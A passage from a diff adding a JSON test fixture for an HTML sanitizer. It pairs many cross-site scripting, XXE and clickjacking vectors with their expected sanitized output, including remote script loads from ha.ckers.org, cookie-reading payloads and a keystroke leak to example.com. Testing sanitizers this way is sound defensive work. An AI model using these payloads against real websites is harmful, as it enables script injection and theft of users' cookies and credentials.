\\R:\\000072 Ed;color\\0\\bla:yellow\\0\\bla;col\\0\\00 \\ or:blue;\">XXX</div>", + "sanitized": "<html><head></head><body><div>XXX</div></body></html>" + }, + { + "data": "<!-- IE 6-8 -->\r\n<x '=\"foo\"><x foo='><img src=x onerror=alert(1)//'>\r\n\r\n<!-- IE 6-9 -->\r\n<! '=\"foo\"><x foo='><img src=x onerror=alert(2)//'>\r\n<? '=\"foo\"><x foo='><img src=x onerror=alert(3)//'>", + "sanitized": "<html><head></head><body>\n\n\n\n</body></html>" + }, + { + "data": "<embed src=\"javascript:alert(1)\"></embed> // O10.10�, OM10.0�, GC6�, FF\r\n<img src=\"javascript:alert(2)\">\r\n<image src=\"javascript:alert(2)\"> // IE6, O10.10�, OM10.0�\r\n<script src=\"javascript:alert(3)\"></script> // IE6, O11.01�, OM10.1�", + "sanitized": "<html><head></head><body> // O10.10�, OM10.0�, GC6�, FF\n<img>\n<img> // IE6, O10.10�, OM10.0�\n // IE6, O11.01�, OM10.1�</body></html>" + }, + { + "data": "<!DOCTYPE x[<!ENTITY x SYSTEM \"http://html5sec.org/test.xxe\">]><y>&x;</y>", + "sanitized": "<!DOCTYPE x[<!entity>\n<html><head></head><body>]>&x;</body></html>" + }, + { + "data": "<svg onload=\"javascript:alert(1)\" xmlns=\"http://www.w3.org/2000/svg\"></svg>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<?xml version=\"1.0\"?>\n<?xml-stylesheet type=\"text/xsl\" href=\"data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E\"?>\n<root/>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<!DOCTYPE x [\r\n\t<!ATTLIST img xmlns CDATA \"http://www.w3.org/1999/xhtml\" src CDATA \"xx:x\"\r\n onerror CDATA \"alert(1)\"\r\n onload CDATA \"alert(2)\">\r\n]><img />", + "sanitized": "<!DOCTYPE x>\n<html><head></head><body>]><img></body></html>" + }, + { + "data": "<doc xmlns:xlink=\"http://www.w3.org/1999/xlink\" xmlns:html=\"http://www.w3.org/1999/xhtml\">\r\n\t<html:style /><x xlink:href=\"javascript:alert(1)\" xlink:type=\"simple\">XXX</x>\r\n</doc>", + "sanitized": "<html><head></head><body>\n\tXXX\n</body></html>" + }, + { + "data": "<card xmlns=\"http://www.wapforum.org/2001/wml\"><onevent type=\"ontimer\"><go href=\"javascript:alert(1)\"/></onevent><timer value=\"1\"/></card>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>", + "sanitized": "<html><head></head><body><div>x</div></body></html>" + }, + { + "data": "<// style=x:expression\\28write(1)\\29>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<form><button formaction=\"javascript:alert(1)\">X</button>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<event-source src=\"event.php\" onload=\"alert(1)\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<a href=\"javascript:alert(1)\"><event-source src=\"data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A\" /></a>", + "sanitized": "<html><head></head><body><a></a></body></html>" + }, + { + "data": "<script<{alert(1)}/></script </>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<?xml-stylesheet type=\"text/css\"?><!DOCTYPE x SYSTEM \"test.dtd\"><x>&x;</x>", + "sanitized": "<!DOCTYPE x SYSTEM \"test.dtd\">\n<html><head></head><body>&x;</body></html>" + }, + { + "data": "<?xml-stylesheet type=\"text/css\"?><root style=\"x:expression(write(1))\"/>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<?xml-stylesheet type=\"text/xsl\" href=\"#\"?><img xmlns=\"x-schema:test.xdr\"/>", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<object allowscriptaccess=\"always\" data=\"test.swf\"></object>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<style>*{x:EXPRESSION(write(1))}</style>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<x xmlns:xlink=\"http://www.w3.org/1999/xlink\" xlink:actuate=\"onLoad\" xlink:href=\"javascript:alert(1)\" xlink:type=\"simple\"/>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<?xml-stylesheet type=\"text/css\" href=\"data:,*%7bx:expression(write(2));%7d\"?>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<x:template xmlns:x=\"http://www.wapforum.org/2001/wml\" x:ontimer=\"$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)\"><x:timer value=\"1\"/></x:template>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<x xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\" ev:handler=\"javascript:alert(1)//#x\"/>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<x xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\" ev:handler=\"test.evt#x\"/>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<body oninput=alert(1)><input autofocus>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\n<a xmlns:xlink=\"http://www.w3.org/1999/xlink\" xlink:href=\"javascript:alert(1)\"><rect width=\"1000\" height=\"1000\" fill=\"white\"/></a>\n</svg>", + "sanitized": "<html><head></head><body>\n\n</body></html>" + }, + { + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\">\n\n<animation xlink:href=\"javascript:alert(1)\"/>\n<animation xlink:href=\"data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E\"/>\n\n<image xlink:href=\"data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E\"/>\n\n<foreignObject xlink:href=\"javascript:alert(1)\"/>\n<foreignObject xlink:href=\"data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E\"/>\n\n</svg>", + "sanitized": "<html><head></head><body>\n\n\n\n\n\n\n\n\n\n</body></html>" + }, + { + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\n<set attributeName=\"onmouseover\" to=\"alert(1)\"/>\n<animate attributeName=\"onunload\" to=\"alert(1)\"/>\n</svg>", + "sanitized": "<html><head></head><body>\n\n\n</body></html>" + }, + { + "data": "<!-- Up to Opera 10.63 -->\r\n<div style=content:url(test2.svg)></div>\r\n\r\n<!-- Up to Opera 11.64 - see link below -->\r\n\r\n<!-- Up to Opera 12.x -->\r\n<div style=\"background:url(test5.svg)\">PRESS ENTER</div>", + "sanitized": "<html><head></head><body><div></div>\n\n\n\n\n<div>PRESS ENTER</div></body></html>" + }, + { + "data": "[A]\n<? foo=\"><script>alert(1)</script>\">\n<! foo=\"><script>alert(1)</script>\">\n</ foo=\"><script>alert(1)</script>\">\n[B]\n<? foo=\"><x foo='?><script>alert(1)</script>'>\">\n[C]\n<! foo=\"[[[x]]\"><x foo=\"]foo><script>alert(1)</script>\">\n[D]\n<% foo><x foo=\"%><script>alert(1)</script>\">", + "sanitized": "<html><head></head><body>[A]\n\">\n\">\n\">\n[B]\n\">\n[C]\n\n[D]\n<% foo></body></html>" + }, + { + "data": "<div style=\"background:url(http://foo.f/f oo/;color:red/*/foo.jpg);\">X</div>", + "sanitized": "<html><head></head><body><div>X</div></body></html>" + }, + { + "data": "<div style=\"list-style:url(http://foo.f)\\20url(javascript:alert(1));\">X</div>", + "sanitized": "<html><head></head><body><div>X</div></body></html>" + }, + { + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\n<handler xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\">alert(1)</handler>\n</svg>", + "sanitized": "<html><head></head><body>\nalert(1)\n</body></html>" + }, + { + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\">\n<feImage>\n<set attributeName=\"xlink:href\" to=\"data:image/svg+xml;charset=utf-8;base64,\nPHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D\"/>\n</feImage>\n</svg>", + "sanitized": "<html><head></head><body>\n\n\n\n</body></html>" + }, + { + "data": "<iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>\n<iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>", + "sanitized": "<html><head></head><body>\n</body></html>" + }, + { + "data": "<!-- IE 5-9 -->\r\n<div id=d><x xmlns=\"><iframe onload=alert(1)\"></div>\n<script>d.innerHTML+='';</script>\r\n\r\n<!-- IE 10 in IE5-9 Standards mode -->\r\n<div id=d><x xmlns='\"><iframe onload=alert(2)//'></div>\n<script>d.innerHTML+='';</script>", + "sanitized": "<html><head></head><body><div id=\"d\"></div>\n\n\n\n<div id=\"d\"></div>\n</body></html>" + }, + { + "data": "<div id=d><div style=\"font-family:'sans\\27\\2F\\2A\\22\\2A\\2F\\3B color\\3Ared\\3B'\">X</div></div>\n<script>with(document.getElementById(\"d\"))innerHTML=innerHTML</script>", + "sanitized": "<html><head></head><body><div id=\"d\"><div>X</div></div>\n</body></html>" + }, + { + "data": "XXX<style>\r\n\r\n*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */\r\n\r\n<!--\r\n--><!--*{color:red} /* all UA */\r\n\r\n*{background:url(xx:x //**/\\red/*)} /* IE 6-7 Standards mode */\r\n\r\n</style>", + "sanitized": "<html><head></head><body>XXX</body></html>" + }, + { + "data": "<img[a][b]src=x[d]onerror[c]=[e]\"alert(1)\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<a href=\"[a]java[b]script[c]:alert(1)\">XXX</a>", + "sanitized": "<html><head></head><body><a>XXX</a></body></html>" + }, + { + "data": "<img src=\"x` `<script>alert(1)</script>\"` `>", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<script>history.pushState(0,0,'/i/am/somewhere_else');</script>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\" id=\"foo\">\r\n<x xmlns=\"http://www.w3.org/2001/xml-events\" event=\"load\" observer=\"foo\" handler=\"data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar\"/>\r\n</svg>", + "sanitized": "<html><head></head><body>\n\n</body></html>" + }, + { + "data": "<iframe src=\"data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03\"></iframe>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<img src onerror /\" '\"= alt=alert(1)//\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<title onpropertychange=alert(1)></title><title title=></title>", + "sanitized": "<html><head><title></title><title title=\"\"></title></head><body></body></html>" + }, + { + "data": "<!-- IE 5-8 standards mode -->\r\n<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=xx:x onerror=alert(1)></a>\">\r\n\r\n<!-- IE 5-9 standards mode -->\r\n<!a foo=x=`y><img alt=\"`><img src=xx:x onerror=alert(2)//\">\r\n<?a foo=x=`y><img alt=\"`><img src=xx:x onerror=alert(3)//\">", + "sanitized": "<html><head></head><body><a href=\"http://foo.bar/#x=%60y\"></a><img alt=\"`><img src=xx:x onerror=alert(1)></a>\">\n\n\n<img alt=\"`><img src=xx:x onerror=alert(2)//\">\n<img alt=\"`><img src=xx:x onerror=alert(3)//\"></body></html>" + }, + { + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\n<a id=\"x\"><rect fill=\"white\" width=\"1000\" height=\"1000\"/></a>\n<rect fill=\"white\" style=\"clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);\"/>\n</svg>", + "sanitized": "<html><head></head><body>\n\n\n</body></html>" + }, + { + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\r\n<path d=\"M0,0\" style=\"marker-start:url(test4.svg#a)\"/>\r\n</svg>", + "sanitized": "<html><head></head><body>\n\n</body></html>" + }, + { + "data": "<div style=\"background:url(/f#[a]oo/;color:red/*/foo.jpg);\">X</div>", + "sanitized": "<html><head></head><body><div>X</div></body></html>" + }, + { + "data": "<div style=\"font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);\">X</div>", + "sanitized": "<html><head></head><body><div>X</div></body></html>" + }, + { + "data": "<div id=\"x\">XXX</div>\n<style>\n\n#x{font-family:foo[bar;color:green;}\n\n#y];color:red;{}\n\n</style>", + "sanitized": "<html><head></head><body><div id=\"x\">XXX</div>\n</body></html>" + }, + { + "data": "<x style=\"background:url('x[a];color:red;/*')\">XXX</x>", + "sanitized": "<html><head></head><body>XXX</body></html>" + }, + { + "data": "<!--[if]><script>alert(1)</script -->\r\n<!--[if<img src=x onerror=alert(2)//]> -->", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<div id=\"x\">x</div>\n<xml:namespace prefix=\"t\">\n<import namespace=\"t\" implementation=\"#default#time2\">\n<t:set attributeName=\"innerHTML\" targetElement=\"x\" to=\"<imgsrc=x:xonerror=alert(1)>\">", + "sanitized": "<html><head></head><body><div id=\"x\">x</div>\n\n\n</body></html>" + }, + { + "data": "<a href=\"http://attacker.org\">\n\t<iframe src=\"http://example.org/\"></iframe>\n</a>", + "sanitized": "<html><head></head><body><a href=\"http://attacker.org\">\n\t\n</a></body></html>" + }, + { + "data": "<div draggable=\"true\" ondragstart=\"event.dataTransfer.setData('text/plain','malicious code');\">\n\t<h1>Drop me</h1>\n</div>\n\n<iframe src=\"http://www.example.org/dropHere.html\"></iframe>", + "sanitized": "<html><head></head><body><div draggable=\"true\">\n\t<h1>Drop me</h1>\n</div>\n\n</body></html>" + }, + { + "data": "<iframe src=\"view-source:http://www.example.org/\" frameborder=\"0\" style=\"width:400px;height:180px\"></iframe>\n\n<textarea type=\"text\" cols=\"50\" rows=\"10\"></textarea>", + "sanitized": "<html><head></head><body>\n\n<textarea type=\"text\" cols=\"50\" rows=\"10\"></textarea></body></html>" + }, + { + "data": "<script>\nfunction makePopups(){\n\tfor (i=1;i<6;i++) {\n\t\twindow.open('popup.html','spam'+i,'width=50,height=50');\n\t}\n}\n</script>\n\n<body>\n<a href=\"#\" onclick=\"makePopups()\">Spam</a>", + "sanitized": "<html><head>\n\n</head><body>\n<a href=\"#\">Spam</a></body></html>" + }, + { + "data": "<html xmlns=\"http://www.w3.org/1999/xhtml\"\nxmlns:svg=\"http://www.w3.org/2000/svg\">\n<body style=\"background:gray\">\n<iframe src=\"http://example.com/\" style=\"width:800px; height:350px; border:none; mask: url(#maskForClickjacking);\"/>\n<svg:svg>\n<svg:mask id=\"maskForClickjacking\" maskUnits=\"objectBoundingBox\" maskContentUnits=\"objectBoundingBox\">\n\t<svg:rect x=\"0.0\" y=\"0.0\" width=\"0.373\" height=\"0.3\" fill=\"white\"/>\n\t<svg:circle cx=\"0.45\" cy=\"0.7\" r=\"0.075\" fill=\"white\"/>\n</svg:mask>\n</svg:svg>\n</body>\n</html>", + "sanitized": "<html><head></head><body>\n\n<svg:svg>\n<svg:mask id=\"maskForClickjacking\" maskUnits=\"objectBoundingBox\" maskContentUnits=\"objectBoundingBox\">\n\t<svg:rect x=\"0.0\" y=\"0.0\" width=\"0.373\" height=\"0.3\" fill=\"white\"/>\n\t<svg:circle cx=\"0.45\" cy=\"0.7\" r=\"0.075\" fill=\"white\"/>\n</svg:mask>\n</svg:svg>\n</body>\n</html></body></html>" + }, + { + "data": "<iframe sandbox=\"allow-same-origin allow-forms allow-scripts\" src=\"http://example.org/\"></iframe>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<span class=foo>Some text</span>\n<a class=bar href=\"http://www.example.org\">www.example.org</a>\n\n<script src=\"http://code.jquery.com/jquery-1.4.4.js\"></script>\n<script>\n$(\"span.foo\").click(function() {\nalert('foo');\n$(\"a.bar\").click();\n});\n$(\"a.bar\").click(function() {\nalert('bar');\nlocation=\"http://html5sec.org\";\n});\n</script>", + "sanitized": "<html><head></head><body><span class=\"foo\">Some text</span>\n<a class=\"bar\" href=\"http://www.example.org\">www.example.org</a>\n\n\n</body></html>" + }, + { + "data": "<script src=\"/\\example.com\\foo.js\"></script> // Safari 5.0, Chrome 9, 10\n<script src=\"\\\\example.com\\foo.js\"></script> // Safari 5.0", + "sanitized": "<html><head> </head><body>// Safari 5.0, Chrome 9, 10\n // Safari 5.0</body></html>" + }, + { + "data": "<?xml version=\"1.0\"?>\r\n<?xml-stylesheet type=\"text/xml\" href=\"#stylesheet\"?>\r\n<!DOCTYPE doc [\r\n<!ATTLIST xsl:stylesheet\r\n id ID #REQUIRED>]>\r\n<svg xmlns=\"http://www.w3.org/2000/svg\">\r\n <xsl:stylesheet id=\"stylesheet\" version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">\r\n <xsl:template match=\"/\">\r\n <iframe xmlns=\"http://www.w3.org/1999/xhtml\" src=\"javascript:alert(1)\"></iframe>\r\n </xsl:template>\r\n </xsl:stylesheet>\r\n <circle fill=\"red\" r=\"40\"></circle>\r\n</svg>", + "sanitized": "<!DOCTYPE doc>\n<html><head></head><body>]>\n\n \n \n \n \n \n \n</body></html>" + }, + { + "data": "<object id=\"x\" classid=\"clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598\"></object>\r\n<object classid=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\" onqt_error=\"alert(1)\" style=\"behavior:url(#x);\"><param name=postdomevents /></object>", + "sanitized": "<html><head></head><body>\n</body></html>" + }, + { + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\" id=\"x\">\r\n<listener event=\"load\" handler=\"#y\" xmlns=\"http://www.w3.org/2001/xml-events\" observer=\"x\"/>\r\n<handler id=\"y\">alert(1)</handler>\r\n</svg>", + "sanitized": "<html><head></head><body>\n\nalert(1)\n</body></html>" + }, + { + "data": "<svg><style><img/src=x onerror=alert(1)// </b>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<svg>\n<image style='filter:url(\"data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>\")'>\n<!--\nSame effect with\n<image filter='...'>\n-->\n</svg>", + "sanitized": "<html><head></head><body>\n\n\n</body></html>" + }, + { + "data": "<math href=\"javascript:alert(1)\">CLICKME</math>\r\n\r\n<math>\r\n<!-- up to FF 13 -->\r\n<maction actiontype=\"statusline#http://google.com\" xlink:href=\"javascript:alert(2)\">CLICKME</maction>\r\n\r\n<!-- FF 14+ -->\r\n<maction actiontype=\"statusline\" xlink:href=\"javascript:alert(3)\">CLICKME<mtext>http://http://google.com</mtext></maction>\r\n</math>", + "sanitized": "<html><head></head><body><math>CLICKME</math>\n\n<math>\n\n<maction actiontype=\"statusline#http://google.com\">CLICKME</maction>\n\n\n<maction actiontype=\"statusline\">CLICKME<mtext>http://http://google.com</mtext></maction>\n</math></body></html>" + }, + { + "data": "<b>drag and drop one of the following strings to the drop box:</b>\r\n<br/><hr/>\r\njAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\r\n<br/><hr/>\r\nfeed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\r\n<br/><hr/>\r\nfeed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b>\r\n<br/><hr/>\r\nfeed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\r\n<br/><hr/>\r\n<div id=\"dropbox\" style=\"height: 360px;width: 500px;border: 5px solid #000;position: relative;\" ondragover=\"event.preventDefault()\">+ Drop Box +</div>", + "sanitized": "<html><head></head><body><b>drag and drop one of the following strings to the drop box:</b>\n<br><hr>\njAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\n<br><hr>\nfeed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\n<br><hr>\nfeed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b>\n<br><hr>\nfeed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\n<br><hr>\n<div id=\"dropbox\">+ Drop Box +</div></body></html>" + }, + { + "data": "<!doctype html>\r\n<form>\r\n<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>\r\n<br>\r\n<input name=\"secret\" type=\"password\">\r\n</form>\r\n<!-- injection --><svg height=\"50px\">\r\n<image xmlns:xlink=\"http://www.w3.org/1999/xlink\">\r\n<set attributeName=\"xlink:href\" begin=\"accessKey(a)\" to=\"//example.com/?a\" />\r\n<set attributeName=\"xlink:href\" begin=\"accessKey(b)\" to=\"//example.com/?b\" />\r\n<set attributeName=\"xlink:href\" begin=\"accessKey(c)\" to=\"//example.com/?c\" />\r\n<set attributeName=\"xlink:href\" begin=\"accessKey(d)\" to=\"//example.com/?d\" />\r\n</image>\r\n</svg>", + "sanitized": "<!DOCTYPE html>\n<html><head></head><body>\n<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>\n<br>\n\n\n\n\n\n\n\n\n\n</body></html>" + }, + { + "data": "<!-- `<img/src=xx:xx onerror=alert(1)//--!>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<xmp>\r\n<%\r\n</xmp>\r\n<img alt='%></xmp><img src=xx:x onerror=alert(1)//'>\r\n\r\n<script>\r\nx='<%'\r\n</script> %>/\r\nalert(2)\r\n</script>\r\n\r\nXXX\r\n<style>\r\n*['<!--']{}\r\n</style>\r\n-->{}\r\n*{color:red}</style>", + "sanitized": "<html><head></head><body>\n<%\n\n<img alt=\"%></xmp><img src=xx:x onerror=alert(1)//\">\n\n %>/\nalert(2)\n\n\nXXX\n\n-->{}\n*{color:red}</body></html>" + }, + { + "data": "<?xml-stylesheet type=\"text/xsl\" href=\"#\" ?>\r\n<stylesheet xmlns=\"http://www.w3.org/TR/WD-xsl\">\r\n<template match=\"/\">\r\n<eval>new ActiveXObject('htmlfile').parentWindow.alert(1)</eval>\r\n<if expr=\"new ActiveXObject('htmlfile').parentWindow.alert(2)\"></if>\r\n</template>\r\n</stylesheet>", + "sanitized": "<html><head></head><body>\n\n</body></html>" + }, + { + "data": "<form action=\"\" method=\"post\">\r\n<input name=\"username\" value=\"admin\" />\r\n<input name=\"password\" type=\"password\" value=\"secret\" />\r\n<input name=\"injected\" value=\"injected\" dirname=\"password\" />\r\n<input type=\"submit\">\r\n</form>", + "sanitized": "<html><head></head><body>\n\n\n\n\n</body></html>" + }, + { + "data": "<SCRIPT>alert('XSS');</SCRIPT>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "'';!--\"<XSS>=&{()}", + "sanitized": "<html><head></head><body>'';!--\"=&{()}</body></html>" + }, + { + "data": "<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<IMG SRC=\"javascript:alert('XSS');\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG SRC=javascript:alert('XSS')>", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG SRC=JaVaScRiPt:alert('XSS')>", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG SRC=javascript:alert("XSS")>", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "SRC=
<IMG 6;avascript:alert('XSS')>", + "sanitized": "<html><head></head><body>SRC=\n<img></body></html>" + }, + { + "data": "<IMG SRC=javascript:alert('XSS')>", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG SRC=javascript:alert('XSS')>", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG SRC=\"javascript:alert('XSS');\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG SRC=\"jav	ascript:alert('XSS');\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG SRC=\"jav
ascript:alert('XSS');\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG SRC=\"jav
ascript:alert('XSS');\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG SRC=\"  javascript:alert('XSS');\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<IMG SRC=\"javascript:alert('XSS')\"", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<SCRIPT>a=/XSS/", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "\\\";alert('XSS');//", + "sanitized": "<html><head></head><body>\\\";alert('XSS');//</body></html>" + }, + { + "data": "<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<BODY BACKGROUND=\"javascript:alert('XSS')\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<BODY ONLOAD=alert('XSS')>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<IMG DYNSRC=\"javascript:alert('XSS')\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG LOWSRC=\"javascript:alert('XSS')\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<BGSOUND SRC=\"javascript:alert('XSS');\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<BR SIZE=\"&{alert('XSS')}\">", + "sanitized": "<html><head></head><body><br></body></html>" + }, + { + "data": "<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<IMG SRC='vbscript:msgbox(\"XSS\")'>", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG SRC=\"mocha:[code]\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG SRC=\"livescript:[code]\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<META HTTP-EQUIV=\"Link\" Content=\"<javascript:alert('XSS')>; REL=stylesheet\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>", + "sanitized": "<html><head></head></html>" + }, + { + "data": "<TABLE BACKGROUND=\"javascript:alert('XSS')\">", + "sanitized": "<html><head></head><body><table></table></body></html>" + }, + { + "data": "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">", + "sanitized": "<html><head></head><body><div></div></body></html>" + }, + { + "data": "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">", + "sanitized": "<html><head></head><body><div></div></body></html>" + }, + { + "data": "<DIV STYLE=\"width: 